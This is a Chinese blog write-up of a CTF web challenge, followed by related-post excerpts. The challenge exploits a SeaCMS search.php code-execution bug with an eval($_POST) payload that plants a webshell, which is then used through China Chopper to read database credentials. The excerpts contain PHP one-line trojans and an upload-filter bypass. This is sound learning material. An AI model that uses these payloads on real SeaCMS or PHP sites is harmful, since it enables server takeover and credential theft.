“百度杯”CTF比赛 九月场--Web--Test--Seacms海洋漏洞

最新推荐文章于 2024-07-27 13:39:59 发布
最新推荐文章于 2024-07-27 13:39:59 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: Writer-up
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhy7788/article/details/80151379
版权

Web题目名称:Test

题目内容:
善于查资料,你就可以拿一血了。

给了我们一个链接
打开就是海洋cms的模板,通过
查百度发现海洋的一个search.php漏洞

Seacms漏洞分析利用复现 By Assassin

ichunqiu

通过这两个 复现漏洞(注意 这里 get post 都可以)

http://53290ec71e554551a257d1a5ce00ab1044953f4646134c17.game.ichunqiu.com/search.php/?searchtype=5&tid=&area=eval($_POST[1])

在search.php 中写入一句话 菜刀连接 密码为 1

这里写图片描述

翻看了一遍,发现并没有flag文件

通过猜测在登陆等php中会出现数据库 一步步查找数据库相关数据(flag可能在数据库中)
/var/www/html/data/common.inc.php

FLAG

FLAG到手了 好难啊

zhhy7788
关注
专栏目录
百度CTF比赛 九月SQLi(多种姿势)
u011250160的博客
04-04 433
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
百度CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 661
百度CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
i春秋——“百度CTF比赛 九月——Test海洋cms / seacms 任意代码执行漏洞)...
weixin_30417487的博客
10-14 632
打开发现是海洋cms,那就搜索相关漏洞 找到一篇介绍海洋cms的命令执行漏洞的文章:https://www.jianshu.com/p/ebf156afda49 直接利用其中给出的poc /search.php searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&...
SeaCMS海洋影视管理系统远程代码执行漏洞复现
最新发布
holyxp的博客
07-27 1021
所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始。因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了。很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell。然后下面的随便填,就像这样子。
百度CTF比赛 九月 Web-SQL
qq_34106499的博客
01-15 408
1. sql注入方式的判断; 2. sql注入过滤的判断; 3. sql注入中敏感词的绕过<>; 4. 基础的mysql union select 注入语句的复习。
百度CTF比赛 九月Web:SQL
Pai_Space
07-04 190
百度CTF比赛 九月Web:SQL
百度CTF比赛 九月 Web-Do you know upload
qq_34106499的博客
01-17 422
1. 上传类型的限制方法; 2. 抓包修改上传文件类型; 3. 菜刀连接一句话木马; 4. 菜刀连接数据库,并查询数据库内容;
百度CTF比赛 九月--Web 考脑洞,你能过么?
hanjinrui15的博客
01-03 603
百度CTF比赛 九月--Web 考脑洞,你能过么?基础知识1、文件包含简述2、PhpStorm文件夹解题思路1、题目分析2、求解题目总结 基础知识 1、文件包含简述 文件包含,就是为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。 为什么文件包含会形成漏洞呢?是因为在包含文件时候,为了灵活使用包含文件的功能,程序员会将被包含文件设置为变量,通过动态变量来引入需要包含的文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被
百度CTF比赛 九月-web123题
weixin_46784800的博客
12-29 518
百度CTF比赛 九月-web123题 知识储备 敏感信息泄露 敏感信息泄露,是指存在一些备份文件未经处理,而保存在网站目录上,可以进行访问,获得一些信息。 网站备份文件泄露常见后缀: .bak .html _index.html .swp .rar .txt .zip .7z .sql .tar.gz .tgz .tar 网站备份文件泄露扫描工具: Test404网站备份文件扫描器 v2.0(win) ihoneyBakFileScan(python) ​ ihoneyBakFile
百度CTF比赛 九月--YeserCMS
Oavinci的博客
03-22 587
正在上传…重新上传取消 在文档下载的评论区发现是EASYCMS 正在上传…重新上传取消 百度EASYCMS存在的漏洞,发现存在无限制报错注入,可获取全站信息 漏洞参考:https://www.w00yun.top/bugs/wooyun-2015-0137013.html 访问/celive/live/header.php进行报错注入 爆数据库,得到“Yeser...
百度CTF比赛 十月-EXEC
r00tnb的博客
07-26 1680
前言 这道题本来要用bash反弹shell的技术的,但是由于没有公网ip的服务器,我就用了命令盲注的方法,特此记录一下。 分析 打开链接题目提示no sign。查看源代码发现这一行 &lt;meta language='utf-8' editor='vim'&gt; 于是就想到了vim信息泄露,于是访问.index.php.swp成功下载了源代码 &lt;html&gt; ...
百度CTF比赛 九月 123
feng的博客
09-11 438
前言 这题主要考察了信息泄露,字典爆破,文件上传,和文件读取(或者文件包含)。 WP 首先进入环境,发现是一个使用用户名和密码进行登录的界面。我们随便尝试,同时使用dirsearch扫一扫,然后看看源码。 源码中提示我们用户信息都在user.php里,用户默认密码为用户名+出生日期 例如:zhangwei1999。 因此我们进入user.php,发现空空的没有东西。我又使用burp抓包也没有办法。这时候我又去想了想是不是http请求头需要改一些东西,有特定的验证才可以,结果还是不行。以前这种看不了文件的情况
i春秋之SQLi--“百度CTF比赛 九月
金 帛的博客
04-04 963
i春秋WP
百度CTF比赛 九月 SQL
SPS98
11-02 313
先放下参考链接:大方子的WP 还有自己以前写的mysql注入 —— union 平台那边的题目是这样的 很明确说是SQL注入,然后打开容器 很明显是要对id进行注入, 先不着急注入, 把id值变换看看 表面看上去只有两条数据的样子 那就先试下常用操作, 在1后面加个' 没有反应, 应该是出错或者屏蔽报错, 再加个#看看 依旧没反应, 再去掉' 从而可以推测出查询语句应该是sele...
i春秋 | “百度CTF比赛 九月 | upload
g1ut_t0ny的博客
07-03 283
upload题目 步骤 1、看看题目,人家多敞亮,想传啥文件就传啥,那我也不客气了,一句话走起 2、就知道不会这么善良 很明显他把我的’<?php’给过滤了 3、想办法绕过:<script language="pHp">@eval($_POST['a'])</script>之所以大写H是因为php被过滤掉了 4、确认上传成功,接下来连菜刀,找flag 福利 我在找资料的时候看见的一些木马,大家一起参考呀 https://www.uedbox.com/post/6
百度CTF比赛 九月 | TEST
g1ut_t0ny的博客
07-04 373
TEST 1、题目提示会查资料就可以拿一血 2、打开题目很明显是海洋CMS,所以直接搜索他的相关漏洞 3、由于我做题比较晚,所以很明显,等待我的只能是一堆wp 4、白嫖开始 5、在common.inc.php中找到了数据库的相关信息,添加配置 6、管理数据库 ...
WP 4 i春秋_百度CTF比赛九月第一
segOt
04-22 2596
CODECODE打开页面后,看到一张图片,且链接为如下形式:http://528c1f8ff4fe439482ce4069e858e805ad9172679385471a.ctf.game/index.php?jpg=hei.jpg 可以看到参数jpg后面跟着一个文件名,查看网页源代码发现,此图片是采用BASE64编码形式显示的。所以可以采取如下方式http://...index.php?jpg=i
i春秋 “百度CTF比赛 九月 SQL
include_heqile的博客
09-12 1411
https://www.ichunqiu.com/battalion?t=1&amp;r=0 看题目就知道这是一道注入题,这道题其实并没有什么难度,主要就是select、union、=等被过滤了,我们需要找到一种有效的绕过方法,这道题的绕过方法就是在敏感字符串中间加上&lt;&gt;,这个是通过提交各种特殊字符串并查看源代码得到的,当我们提交了&lt;&gt;之后,再去查看源代码,会发现源代码界...
python跨文件传输变量
cuicui_ruirui的博客
09-15 3166
假设有两个文件file1.py,file4.py。file4.py文件需要调用file1.py文件中的某个变量。 file4.py与file1.py之间是通过文件中的函数相关联的,其中file1.py需要经过三个文件file2.py,file3.py,file4.py之间的相互关系才能到达file4.py。 原代码是 file1: class LabanWidget(BVHPlayerPy): def loadFile(self): str=cal.Calcula
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值